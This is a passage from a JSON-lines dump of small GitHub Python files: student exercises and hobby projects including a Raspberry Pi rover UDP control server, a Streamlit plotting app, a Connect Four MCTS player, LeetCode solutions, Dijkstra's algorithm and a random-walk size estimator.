RADIUS\n","repo_name":"hardlyHacking/cs1","sub_path":"static/solutions/labs/bfs/solution/vertex.py","file_name":"vertex.py","file_ext":"py","file_size_in_byte":2695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22444315624","text":"def process(string):\n num1, num2 = string.split(\" \")\n num1 = int(num1, 2)\n num2 = int(num2, 2)\n res = bin(num1 * num2).replace(\"0b\", \"\")\n return res\n\n\nif __name__ == \"__main__\":\n bin_string = input(\"Type 2 binary numbers with space between them\")\n print(process(bin_string))\n","repo_name":"UralmashFox/DE_Sprint","sub_path":"1_3/task_5.py","file_name":"task_5.py","file_ext":"py","file_size_in_byte":296,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1291538287","text":"# -*- coding: utf-8 -*-\nimport socket\nimport RPi.GPIO as GPIO\nimport pygame\nfrom rover import forwards, motor1, motor2, motor3, motor4,halt , left, right, cutl,cutr, backwards\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BCM)\nchan_list = [16,20,26,21]\nGPIO.setup(chan_list, GPIO.OUT)\n\nmotor1.start(0)\nmotor2.start(0)\nmotor3.start(0)\nmotor4.start(0)\n\nprint(\"Kører serveren\\n\")\n\nhost = 
\"0.0.0.0\" #IP-adressen for Raspberry Pi\nport = 3000\n\nskt = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nskt.bind((host, port)) # Tilskriver IP-adressen og porten til vores socket\n\nwhile True:\n data, adresse = skt.recvfrom(64)\n dekodet_data = data.decode(\"UTF-8\")\n\n if data:\n print(\"Data modtaget: \", str(dekodet_data))\n skt.sendto(data, adresse)\n if str(dekodet_data) ==\"forwards\":\n forwards()\n elif str(dekodet_data)==\"stop\":\n halt()\n if str(dekodet_data)==\"backwards\":\n backwards()\n elif str(dekodet_data)==\"stop\":\n halt()\n if str(dekodet_data) ==\"left\":\n left()\n elif str(dekodet_data)==\"cutl\":\n cutl()\n if str(dekodet_data) ==\"right\":\n right()\n elif str(dekodet_data)==\"cutr\":\n cutr()\n else:\n print(\"Ikke mere data.\")\n break\nskt.close()\n\n","repo_name":"Jonas-ML/Programmering","sub_path":"Rover-projekt/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":1313,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"31188577515","text":"import streamlit as st\r\nimport seaborn as sns\r\nimport pandas as pd\r\nimport matplotlib.pyplot as plt\r\n\r\nsiteHeader = st.container()\r\ndataExploration = st.container()\r\nnewFeatures = st.container()\r\n\r\nwith siteHeader:\r\n st.title('Welcome to the Awesome Web App!')\r\n\r\nwith dataExploration:\r\n st.header('Dataset: Wisconsin cancer dataset')\r\n st.text('Found the dataset on Kaggle ')\r\n\r\ndf_data = pd.read_csv(\"https://raw.githubusercontent.com/KoushikSai01/CMSE_830_projects/main/data.csv\")\r\nprint(df_data)\r\n#choosing option-1 from the dropdown\r\n\r\nplot =['scatter', 'histogram']\r\nselected_option_0= st.selectbox(\"Which Plot do you want to plot?\", plot)\r\nst.write('You selected:', selected_option_0)\r\n\r\n\r\n\r\nif selected_option_0 == plot[1]:\r\n #choosing option-1 from the dropdown\r\n\r\n selected_option_1= st.selectbox(\"x axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_1)\r\n #choosing option-2 from the dropdown\r\n \r\n # choosing which plot\r\n \r\n selected_option_2= st.selectbox(\"y axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_2)\r\n \r\n fig=plt.figure(figsize=(9,7))\r\n sns.histplot(data=df_data, x=selected_option_1,y=selected_option_2, bins=20, hue=\"diagnosis\")\r\n st.pyplot(fig)\r\n \r\n\r\nif selected_option_0 == plot[0]:\r\n #choosing option-1 from the dropdown\r\n\r\n selected_option_1= st.selectbox(\"x axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_1)\r\n #choosing option-2 from the dropdown\r\n \r\n # choosing which plot\r\n \r\n selected_option_2= st.selectbox(\"y axis feature?\", df_data.columns)\r\n st.write('You selected:', selected_option_2)\r\n \r\n fig=plt.figure(figsize=(9,7))\r\n sns.scatterplot(data=df_data, x=selected_option_1, y=selected_option_2, hue=\"diagnosis\")\r\n st.pyplot(fig)\r\n","repo_name":"KoushikSai01/CMSE_830_projects","sub_path":"ICA23sep.py","file_name":"ICA23sep.py","file_ext":"py","file_size_in_byte":1845,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"72009735930","text":"import time\nimport difflib\n\n# load dictionary words from file\ndef load_words():\n da_words = []\n start_time = time.time()\n \n with open('da words.txt', 'r') as f:\n for line in f:\n da_words.append(line.rstrip())\n end_time = time.time()\n\n elapsed_time = end_time - start_time\n # log words loaded and elapsed 
time\n print('Loaded ' + str(len(da_words)) + ' words in ' + f'{elapsed_time:.2f}' + ' seconds.')\n\n return da_words\n\n#autocorrect function\n\ndef autocorrect(text, da_words):\n for w in text.casefold().split():\n if w not in da_words:\n suggestion = difflib.get_close_matches(w, da_words)\n print(f'Did you mean {\" , \".join(str(x) for x in suggestion)} instead of {w}?')\n \n else:\n print('Looks good!')\n\n \n return text\n\ndef main():\n da_words = load_words()\n print('Type a word or sentence or type \\\"quit\\\" to stop')\n while True:\n text = input(':> ')\n if ('quit' == text):\n break\n autocorrect(text, da_words)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"aubreyvz/Elite-Qualifier","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1077,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"93366602","text":"import random\nimport copy\nfrom P4 import *\nfrom math import sqrt, log\n\n\nC = 1.1\n\nclass Node:\n def __init__(self, etat, parent, joue, mouvement):\n self.etat = copy.deepcopy(etat)\n self.mouvement = mouvement\n self.joue = joue # boolean: whose turn it is; True = the computer plays\n self.parent = parent\n self.enfants = []\n self.listeScore=[0,0,0]\n self.nb_visites = 1\n \n\n def selection(self):\n if(self.enfants != []):\n poids = []\n for enfant in self.enfants:\n poids.append(int (100*enfant.calculerValeurNoeud()))\n #print(poids)\n \n tmp = random.choices(self.enfants, weights=poids)\n return tmp[0].selection()\n else:\n return self\n\n\n def extension (self) :\n if not (verif_gagnage(couleur.rouge, self.etat) or verif_gagnage(couleur.jaune, self.etat)) :\n coup_possible = liste_coup_possible(self.etat)\n for c in range (len(coup_possible)) :\n grille_tampon=copy.deepcopy(self.etat) \n colonne = coup_possible[c][0]\n if (self.joue and MCTS_COULEUR == couleur.jaune) or ((not self.joue) and MCTS_COULEUR == couleur.rouge) :\n jouer_coup(couleur.jaune, colonne, grille_tampon)\n else : \n jouer_coup(couleur.rouge, colonne, grille_tampon)\n noeud_tampon = Node(grille_tampon, self, not(self.joue), coup_possible[c])\n self.enfants.append(noeud_tampon)\n #afficher_grille(self.etat)\n \n\n def devient_racine(self) : \n del self.parent\n self.parent = None\n\n def est_racine(self) :\n return self.parent == None\n \n \n\n def simulation (self):\n res = 0\n indicateur = True \n iteration = 0\n temp = copy.deepcopy(self.etat)\n\n while (indicateur == True):\n \n liste_coup = liste_coup_possible(temp)\n if (len(liste_coup) > 0) :\n i =random.randint(0, len(liste_coup)-1)\n coup = liste_coup[i][0]\n\n \n if (self.joue and MCTS_COULEUR == couleur.jaune) or ((not self.joue) and MCTS_COULEUR == couleur.rouge):\n val = couleur.jaune\n val2 = couleur.rouge\n else:\n val = couleur.rouge\n val2 = couleur.jaune\n \n if (iteration % 2 == 0) : \n temp = jouer_coup(val, coup, temp)\n if (verif_gagnage(val, temp)):\n #afficher_grille(temp)\n if (self.joue) : \n res = 1\n else : \n res = -1\n indicateur = 0 \n \n else : \n temp = jouer_coup(val2, coup, temp)\n if (verif_gagnage(val2, temp)):\n #afficher_grille(temp)\n if (self.joue) : \n res = -1\n else : \n res = 1\n indicateur = 0\n\n iteration += 1\n else :\n #afficher_grille(temp)\n res = 0\n indicateur = 0\n \n return res \n \n\n\n\n\n def propagationDuResultat (self, resultat): # resultat is the result of the simulation\n tampon=self\n while (tampon.parent != None) : \n 
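# walk up the tree, updating the score and visit counters of each ancestor\n 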
if(resultat==0): # draw\n tampon.listeScore[1]+=1\n elif(resultat==1): # win\n tampon.listeScore[0]+=1\n elif(resultat==-1): # loss\n tampon.listeScore[2]+=1 # the score list has the form [wins, draws, losses]\n tampon.nb_visites+=1\n tampon=tampon.parent\n if(resultat==0): # draw\n tampon.listeScore[1]+=1\n elif(resultat==1): # win\n tampon.listeScore[0]+=1\n elif(resultat==-1): # loss\n tampon.listeScore[2]+=1 # the score list has the form [wins, draws, losses]\n tampon.nb_visites+=1\n \n\n\n def calculerValeurNoeud(self): \n if(self.joue==True):\n nbVictoire=self.listeScore[0]\n if(self.joue==False): \n nbVictoire=self.listeScore[2] # we want a node that is losing for the opponent \n valeurMoyenne=nbVictoire/self.nb_visites\n\n #print(valeurMoyenne, \"average value\")\n #print(self.parent.nb_visites/self.nb_visites, \"visit ratio\")\n #print(log(self.parent.nb_visites)/self.nb_visites, \"for inspection\")\n\n ret = valeurMoyenne + C*sqrt(log(self.parent.nb_visites)/self.nb_visites)\n #print (ret, \" value that apparently drops below 0\")\n return ret\n\n \n def meilleurEnfant(self):\n meilleurScore = 'nul'\n listeEnfants = []\n for c in range(len(self.enfants)) :\n listeScore=self.enfants[c].listeScore\n if (listeScore == [0, 0, 0]) :\n score = 0\n else :\n score = (listeScore[0] + 0.2 * listeScore[1]) / (listeScore[0] + listeScore[1] + listeScore[2])\n #afficher_grille(self.enfants[c].etat)\n #print (\"Child no:\", c, \"with a score of\", score)\n if (meilleurScore == 'nul') :\n meilleurScore=score\n listeEnfants.append(self.enfants[c])\n elif (score == meilleurScore):\n listeEnfants.append(self.enfants[c])\n elif (score > meilleurScore):\n listeEnfants = [self.enfants[c]]\n meilleurScore = score \n return random.choice(listeEnfants)\n\n def retrouveEnfant(self, mouvement) : \n for e in range (len(self.enfants)) :\n if self.enfants[e].mouvement[0] == mouvement : \n return e\n return 0\n\n\n\n","repo_name":"Damidas0/-2022-Cours-MCTS-Minmax-applique-au-puissance-4","sub_path":"MCTS.py","file_name":"MCTS.py","file_ext":"py","file_size_in_byte":6094,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"43372311238","text":"# You are given the head of a linked list, and an integer k.\n# Return the head of the linked list after swapping the values of the kth node from the beginning\n# and the kth node from the end (the list is 1-indexed).\n# ----------------------\n# The number of nodes in the list is n.\n# 1 <= k <= n <= 10 ** 5 , 0 <= Node.val <= 100\n\n\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val: int = val\n self.next: ListNode = next\n\n def __str__(self):\n return f\"{self.val} -> {self.next}\"\n\n\ndef create_linked(to_link: list[int]) -> ListNode:\n tempo = link = ListNode()\n for index in range(len(to_link)):\n tempo.val = to_link[index]\n if index != (len(to_link) - 1):\n tempo.next = ListNode()\n tempo = tempo.next\n return link\n\n\ndef t_one_linked(to_test: ListNode, testout: list[int]) -> None:\n tempo: ListNode = to_test\n count: int = 0\n for _ in range(len(testout)):\n assert testout[_] == tempo.val\n tempo = tempo.next\n count += 1\n assert count == len(testout)\n\n\ndef swap_nodes(head: ListNode, k: int) -> ListNode:\n # working_sol (75.95%, 34.80%) -> (952ms, 50.9mb) time: O(n) | space: O(n)\n if not head:\n return head\n all_nodes: list[ListNode] = [0] # for 1 indexed\n tempo: ListNode = head\n while tempo:\n 
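# keep a reference to every node so the kth node from either end can be indexed directly\n 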
all_nodes.append(tempo)\n tempo = tempo.next\n all_nodes[k].val, all_nodes[-k].val = all_nodes[-k].val, all_nodes[k].val\n return head\n\n\n# Time complexity: O(n) -> traversing input_list once, and creating list with links to every node => O(n)\n# n - number of nodes in input_list^^|\n# Auxiliary space: O(n) -> extra list with links to all nodes of input_list => O(n)\n# ----------------------\n# No info about correct input, guess this is why it's medium.\n# Because what if k == 3 and the list has only 1 node?\n# !\n# The number of nodes in the list is n. 1 <= k <= n <= 10 ** 5 !\n# Ok. It's fine.\n# ----------------------\n# No limitations, just save the whole list and swap the kth nodes in a list; append is O(1), get index is O(1),\n# should be enough.\n\n\ntest1 = [1, 2, 3, 4, 5]\ntest1_k = 2\ntest1_out = [1, 4, 3, 2, 5]\ntest1_linked = create_linked(test1)\ntest = swap_nodes(test1_linked, test1_k)\nt_one_linked(test, test1_out)\ndel test\n\ntest2 = [7, 9, 6, 6, 7, 8, 3, 0, 9, 5]\ntest2_k = 5\ntest2_out = [7, 9, 6, 6, 8, 7, 3, 0, 9, 5]\ntest2_linked = create_linked(test2)\ntest = swap_nodes(test2_linked, test2_k)\nt_one_linked(test, test2_out)\ndel test\n","repo_name":"Massprod/leetcode-testing","sub_path":"leetcode_problems/p1721_swapping_nodes_in_a_linked_list.py","file_name":"p1721_swapping_nodes_in_a_linked_list.py","file_ext":"py","file_size_in_byte":2490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"21558455587","text":"\"\"\"===============================================================================\n\n FILE: _common.py\n\n USAGE: (not intended to be directly executed)\n\n DESCRIPTION: \n\n OPTIONS: ---\nREQUIREMENTS: ---\n BUGS: ---\n NOTES: ---\n AUTHOR: Alex Leontiev (alozz1991@gmail.com)\nORGANIZATION: \n VERSION: ---\n CREATED: 2021-05-09T14:28:51.296432\n REVISION: ---\n\n===============================================================================\"\"\"\nimport os\nfrom os import path\n\n\nclass Input:\n def __init__(self,):\n self._id = 0\n self._dropdowns = {}\n for fn in os.listdir(\"data/dropdowns\"):\n if fn.endswith(\".txt\"):\n with open(path.join(\"data/dropdowns\", fn)) as f:\n content = f.read().strip()\n self._dropdowns[fn[:-4]] = [line.strip()\n for line in content.split(\"\\n\") if len(line.strip()) > 0]\n\n def input(self):\n id_ = self._id\n self._id += 1\n return f\"\"\"\"\"\"\n\n def dropdown_names(self):\n res = list(self._dropdowns)\n# print(f\"dropdown_names: {res}\")\n return res\n\n def dropdown(self, dropdown_name):\n choices = self._dropdowns[str(dropdown_name)]\n choices = [\"\",*choices]\n# print(f\"{dropdown_name} => {choices}\")\n\n id_ = self._id\n self._id += 1\n\n res = f\"\"\n return res\n","repo_name":"nailbiter/candice-accounting-threadmill","sub_path":"_common.py","file_name":"_common.py","file_ext":"py","file_size_in_byte":1629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"39545250882","text":"from RPi import GPIO\nfrom time import sleep\n\nswitch = 10 #Switch pin\nclk = 11 #CLK pin\ndt = 12 #PWM0\nledpin = 33 #PWM 1\n\nswitch_state = False\n\nGPIO.setwarnings(False)\nGPIO.setmode(GPIO.BOARD)\n\nGPIO.setup(switch, GPIO.IN, pull_up_down=GPIO.PUD_UP) #Pull-up on switch\nGPIO.setup(clk, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Pull-down on CLK\nGPIO.setup(dt, GPIO.IN, pull_up_down=GPIO.PUD_DOWN) #Pull-down on dt\nGPIO.setup(ledpin, GPIO.OUT)\n\nRPI_PWM = GPIO.PWM(ledpin, 100)\nRPI_PWM.start(0) #Starts at 0% 
duty cycle\n\ncounter = 50\nclkLastState = GPIO.input(clk)\n\ndef button_pressed_callback(channel):\n global switch_state\n global counter\n switch_state = not switch_state\n if switch_state == False:\n RPI_PWM.stop()\n print(\"Stopper\")\n if switch_state == True:\n RPI_PWM.start(counter)\n print(\"starter\")\n sleep(0.2) # short debounce pause (seconds)\n\nGPIO.add_event_detect(switch, GPIO.RISING, callback=button_pressed_callback, bouncetime=200)\n\ndef Limit(number, min_number, max_number):\n if number < min_number:\n return min_number\n elif number > max_number:\n return max_number\n else:\n return number\n \ntry:\n while True: \n if switch_state == True: #If the state is True, adjust the light according to the encoder\n clkState = GPIO.input(clk)\n dtState = GPIO.input(dt)\n if clkState != clkLastState:\n if dtState != clkState:\n counter += 5 #Count one step up\n else:\n counter -= 5 #Count one step down\n counter = Limit(counter, 1, 100) #Clamp the counter between 1 and 100 (min and max duty cycle)\n RPI_PWM.ChangeDutyCycle(counter) #Set the LED duty cycle equal to the counter\n print(counter)\n clkLastState = clkState\n sleep(0.01)\nfinally:\n GPIO.cleanup()","repo_name":"SyverH/RotaryEncoderLedPWM","sub_path":"RotaryEncoderPWM.py","file_name":"RotaryEncoderPWM.py","file_ext":"py","file_size_in_byte":1937,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"36520230143","text":"#!/bin/python\nimport sys\nimport time\nimport tempfile\nimport requests as rq\nfrom bs4 import BeautifulSoup as bs\nfrom pathlib import Path\nimport os\nimport multiprocessing\nfrom pySmartDL import SmartDL\nimport subprocess\n\ndef search(name,cat):\n page = rq.get(\"https://myanimelist.net/anime.php?q={}&cat={}\".format(name,cat))\n soup = bs(page.content,features=\"lxml\")\n for title in soup.findAll('strong')[0:10]:\n link = title.findPrevious('a')['href']\n typ = title.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n epi = typ.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n score = epi.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n print (title.text.strip(), end='\\t')\n print (\"Episodes:\",epi.text.strip(), end='\\t')\n print (\"Score:\",score.text.strip(), end='\\t')\n print (\"Type:\",typ.text.strip())\n print (\"Link:\",link.strip())\n print ()\n page = rq.get(\"https://myanimelist.net/manga.php?q={}&cat={}\".format(name,cat))\n soup = bs(page.content,features=\"lxml\")\n for title in soup.findAll('strong')[0:10]:\n link = title.findPrevious('a')['href']\n typ = title.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n epi = typ.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n score = epi.findNext('td', {\"class\": \"borderClass ac bgColor0\"})\n print (title.text.strip(), end='\\t')\n print (\"Episodes:\",epi.text.strip(), end='\\t')\n print (\"Score:\",score.text.strip(), end='\\t')\n print (\"Type:\",typ.text.strip())\n print (\"Link:\",link.strip())\n print ()\n\n\nn = len(sys.argv)\ncat = \"\"\nif n == 1:\n print (\"USAGE: python [category]\\nCategory = anime(an)/manga(ma)/all(al)\")\n quit()\nelif n == 2:\n name = sys.argv[1]\nelif n == 3:\n name = sys.argv[1]\n cat = sys.argv[2]\n if cat == \"anime\" or cat == \"an\":\n cat = \"anime\"\n elif cat == \"manga\" or cat == \"ma\":\n cat = \"manga\"\n elif cat == \"all\" or cat == \"al\":\n cat = \"all\"\n else:\n print (\"Invalid category\")\n quit()\nelse:\n 
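# any other argument count is unsupported\n 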
quit()\n\nsearch(name,cat)\n","repo_name":"abhirup-m/shell-scripts","sub_path":"anime_search.py","file_name":"anime_search.py","file_ext":"py","file_size_in_byte":2132,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"14525133214","text":"#\n# @lc app=leetcode id=295 lang=python3\n#\n# [295] Find Median from Data Stream\n#\n\n# @lc code=start\nclass MedianFinder:\n\n def __init__(self):\n self.H = []\n\n def addNum(self, num: int) -> None:\n for i in range(len(self.H)):\n if self.H[i] <= num:\n continue\n self.H.insert(i,num)\n return\n self.H.append(num)\n def findMedian(self) -> float:\n \n if len(self.H) % 2 == 0:\n return (self.H[(len(self.H)//2)-1] + self.H[len(self.H)//2])/2\n else:\n return self.H[(len(self.H)//2)]\n\n# Your MedianFinder object will be instantiated and called as such:\n# obj = MedianFinder()\n# obj.addNum(num)\n# param_2 = obj.findMedian()\n# @lc code=end\n\n","repo_name":"AbhiPatel2105/problem_solving","sub_path":"leetcode/295.find-median-from-data-stream.py","file_name":"295.find-median-from-data-stream.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"5071206179","text":"# -*- encoding: utf-8 -*-\nimport matplotlib.pyplot as plt\n\n\ndef f(x):\n return 1 / (1 + x ** 2)\n\n\ndef lagrange(x, begin: int, end: int, n: int):\n xn = [i / n for i in range(begin * n, end * n + 1, n)]\n yn = [f(i) for i in xn]\n sum = 0\n for k in range(len(yn)):\n multi = 1\n for i in range(len(xn)):\n if i != k:\n multi *= (x - xn[i]) / (xn[k] - xn[i])\n sum += yn[k] * multi\n return sum\n\n\ndef main():\n begin = -5\n end = 5\n n = 10\n xn = [i / n for i in range(begin * n, end * n + 1)]\n yn = [f(i) for i in xn]\n ln = [lagrange(i, begin, end, n) for i in xn]\n ymax=max(1,max(ln),-min(ln))\n plt.plot(xn, yn, color='r', label='f(x)')\n plt.plot(xn, ln, color='b', label='Ln(x)')\n plt.legend()\n plt.axis([begin,end,-ymax*2,ymax*2])\n plt.show()\n\n\nif __name__ == '__main__':\n main()\n","repo_name":"befallenStar/engineering-mathematics","sub_path":"polynomial_interpolation.py","file_name":"polynomial_interpolation.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"29085064828","text":"import sys\nimport heapq\n\nn, e = map(int, sys.stdin.readline().split())\n\ngraph = [[] for _ in range(n)]\nfor _ in range(e):\n a,b,c = map(int, sys.stdin.readline().split())\n graph[a-1].append((b-1,c))\n graph[b-1].append((a-1,c))\n\nv1, v2 = map(int, sys.stdin.readline().split())\n\ndef djs(st):\n distance = [int(1e9)] * n\n que = []\n\n heapq.heappush(que,(0, st))\n distance[st] = 0\n \n while que:\n dist, now = heapq.heappop(que)\n\n if distance[now] < dist:\n continue\n for i in graph[now]:\n cost = dist + i[1]\n if cost < distance[i[0]]:\n distance[i[0]] = cost\n heapq.heappush(que,(cost, i[0]))\n \n return distance\n\nfromS = djs(0)\nfromV1 = djs(v1-1)\nfromV2 = djs(v2 - 1)\n\ncase1 = fromS[v1-1] + fromV1[v2-1] + fromV2[n-1]\ncase2 = fromS[v2-1] + fromV2[v1-1] + fromV1[n-1]\n\nif case1 >= int(1e9) and case2 >= int(1e9):\n print(-1)\nelse:\n print(min(case1, case2))","repo_name":"spaceOfSoul/baekjunSolve_python","sub_path":"1504.py","file_name":"1504.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"15952880305","text":"def 
run(): \r\n # Dictionaries are accessed by keys instead of indexes \r\n my_dictionary = {\r\n 'llave1': 1,\r\n 'llave2': 2,\r\n 'llave3': 3,\r\n }\r\n # An element of the dictionary is accessed by its key, in square brackets\r\n #print(my_dictionary['llave1'])\r\n poblacion_paises ={\r\n 'Argentina': 44938712,\r\n 'Brazil': 210147125,\r\n 'Colombia': 4648111,\r\n }\r\n\r\n # Show the dictionary keys; it WORKS WITHOUT .keys\r\n #for paises in poblacion_paises.keys():\r\n # print(paises)\r\n #Show the values assigned to those keys; .values IS REQUIRED\r\n #for habitantes in poblacion_paises.values():\r\n #print(habitantes)\r\n \r\n for paises, poblacion in poblacion_paises.items():\r\n print(paises + ' '+ str(poblacion))\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n run()","repo_name":"snnare/python_proyects","sub_path":"diccionarios.py","file_name":"diccionarios.py","file_ext":"py","file_size_in_byte":873,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"}
{"seq_id":"70505269369","text":"import random\nimport math\n\nfrom abs_estimator import AbsEstimator\n\n\nclass RandomWalk(AbsEstimator):\n _MIN_NUMBER_MATCHES_FOR_SEED_QUERY_INFORMATION = \"Número mínimo de resultados para busca semente\"\n _MIN_NUMBER_MATCHES_FOR_SEED_QUERY = 2\n _MIN_NUMBER_WORDS_INFORMATION = \"Número mínimo de palavras em um dcumento sorteado\"\n _MIN_NUMBER_WORDS = 2\n _RANDOM_WALK_SAMPLE_SIZE_INFORMATION = \"Número de nós visitados durante um \\\"random walk\\\"\"\n _RANDOM_WALK_SAMPLE_SIZE = 5000\n\n @property\n def experiment_details(self):\n additional_information = {RandomWalk._MIN_NUMBER_WORDS_INFORMATION:\n RandomWalk._MIN_NUMBER_WORDS,\n RandomWalk._MIN_NUMBER_MATCHES_FOR_SEED_QUERY_INFORMATION:\n RandomWalk._MIN_NUMBER_MATCHES_FOR_SEED_QUERY,\n RandomWalk._RANDOM_WALK_SAMPLE_SIZE_INFORMATION:\n RandomWalk._RANDOM_WALK_SAMPLE_SIZE}\n return additional_information\n\n @property\n def common_api(self):\n return self.__common_api\n\n @common_api.setter\n def common_api(self, val):\n self.__common_api = val\n\n def __init__(self, common_api):\n self.__common_api = common_api\n\n def estimate(self):\n super().estimate()\n document_degree_list = []\n frequency_number_nodes_dict = self._random_walk(document_degree_list)\n n = len(document_degree_list)\n dw = sum(document_degree_list) / n\n dh = n / sum([1 / x for x in document_degree_list])\n binomy_n_2 = math.factorial(n) / (math.factorial(n - 2) * 2)\n c = sum([((math.factorial(x) / (math.factorial(x - 2) * 2)) * frequency_number_nodes_dict[x]) for x in\n frequency_number_nodes_dict.keys()])\n estimation = (dw / dh) * binomy_n_2 * (1 / c)\n return estimation\n\n def _random_walk(self, document_degree_list):\n query_pool = self.common_api.read_query_pool()\n size = len(query_pool)\n query = query_pool[random.randrange(0, size)]\n number_matches = self.common_api.retrieve_number_matches(query)\n while number_matches < RandomWalk._MIN_NUMBER_MATCHES_FOR_SEED_QUERY:\n query = query_pool[random.randrange(0, size)]\n number_matches = self.common_api.retrieve_number_matches(query)\n words = []\n count = 0\n number_words = 0\n node_frequency_dict = {}\n while count < RandomWalk._RANDOM_WALK_SAMPLE_SIZE:\n if number_matches > 0:\n random_index = random.randrange(0, number_matches)\n try:\n results = self.common_api.download(query, True, True, random_index, 1).results\n except:\n query = words[random.randrange(0, number_words)]\n number_matches = 
self.common_api.retrieve_number_matches(query)\n continue\n document = results[0]\n words_buffer = self.common_api.extract_words(document.content)\n number_words_buffer = len(words_buffer)\n if number_words_buffer < RandomWalk._MIN_NUMBER_WORDS:\n query = words[random.randrange(0, number_words)]\n number_matches = self.common_api.retrieve_number_matches(query)\n continue\n words = words_buffer\n number_words = number_words_buffer\n document_degree_list.append(number_words)\n node_frequency_dict[document.identifier] = \\\n node_frequency_dict.get(document.identifier, 0) + 1\n count += 1\n self.common_api.report_progress(count, RandomWalk._RANDOM_WALK_SAMPLE_SIZE)\n query = words[random.randrange(0, number_words)]\n number_matches = self.common_api.retrieve_number_matches(query)\n frequency_node_dict = {}\n for key in node_frequency_dict.keys():\n frequency_node_dict[node_frequency_dict[key]] = frequency_node_dict.get(node_frequency_dict[key], [])\n frequency_node_dict[node_frequency_dict[key]].append(key)\n frequency_number_nodes_dict = {x: len(frequency_node_dict[x]) for x in frequency_node_dict.keys() if x > 1}\n return frequency_number_nodes_dict\n","repo_name":"fpbfabio/estimation_methods","sub_path":"random_walk.py","file_name":"random_walk.py","file_ext":"py","file_size_in_byte":4349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"30374494808","text":"def isPrime(num: int) -> bool:\n\tif(num == 1):\n\t\treturn False\n\tfor i in range(2,int(num**0.5) + 1):\n\t\tif not(num%i):\n\t\t\t#print(num,\"is devied by\",i)\n\t\t\treturn False\n\t#print(num,\"is prime\")\n\treturn True\n\ndef isPrimeday(day: int) -> bool:\n\ti = 10\n\twhile day//i:\n\t\tif(isPrime(day%i)):\n\t\t\ti = i * 10\n\t\telse:\n\t\t\t#print(day,'is not prime')\n\t\t\treturn False\n\tif(not isPrime(day)):\n\t\treturn False\n\n\treturn True\n\n\ndef isDate(day: int) -> bool:\n\tif day%100 > 31 or day%100 < 0:\n\t\treturn False\n\tif (day%10000)//100 > 12 or (day%10000)//100 < 1:\n\t\treturn False\n\tif (day%10000 == 230 or day%10000 == 231 or day%10000 == 431 or day%10000 == 631 or day%10000 == 931 or day%10000 == 1131):\n\t\treturn False\n\treturn True\n\nif(__name__ == '__main__'):\n\tfor i in range(10000,21191232):\n\t#for i in range(20190523, 20200000):\n\t\tif isDate(i):\n\t\t\tif isPrimeday(i):\n\t\t\t\tprint(i,\"++++++++++++++is primeday!++++++++++++++\")\n\t\t\t\t#isPrimedayProof(i)\nelse:\n\tprint(\"not imported\")","repo_name":"principia12/Lecture-Preparation-","sub_path":"Examples/little_coding/Primeday/primeday.py","file_name":"primeday.py","file_ext":"py","file_size_in_byte":945,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9657925229","text":"def can_sum(target_sum, numbers):\n if target_sum == 0:\n return True\n if target_sum < 0:\n return False\n for number in numbers:\n remainder = target_sum - number\n print(\"rem: \", remainder)\n if (can_sum(remainder, numbers) == True):\n return True\n return False\n\ndef can_sum_dp(target_sum, numbers, cs_hash = {}):\n if target_sum == 0:\n return True\n if target_sum < 0:\n return False\n if target_sum in cs_hash:\n return cs_hash[target_sum]\n for number in numbers:\n remainder = target_sum - number\n print(cs_hash)\n if (can_sum_dp(remainder, numbers, cs_hash) == True):\n cs_hash[remainder] = True\n return True\n else:\n cs_hash[remainder] = False\n\n return False\nprint(can_sum_dp(714, [7, 
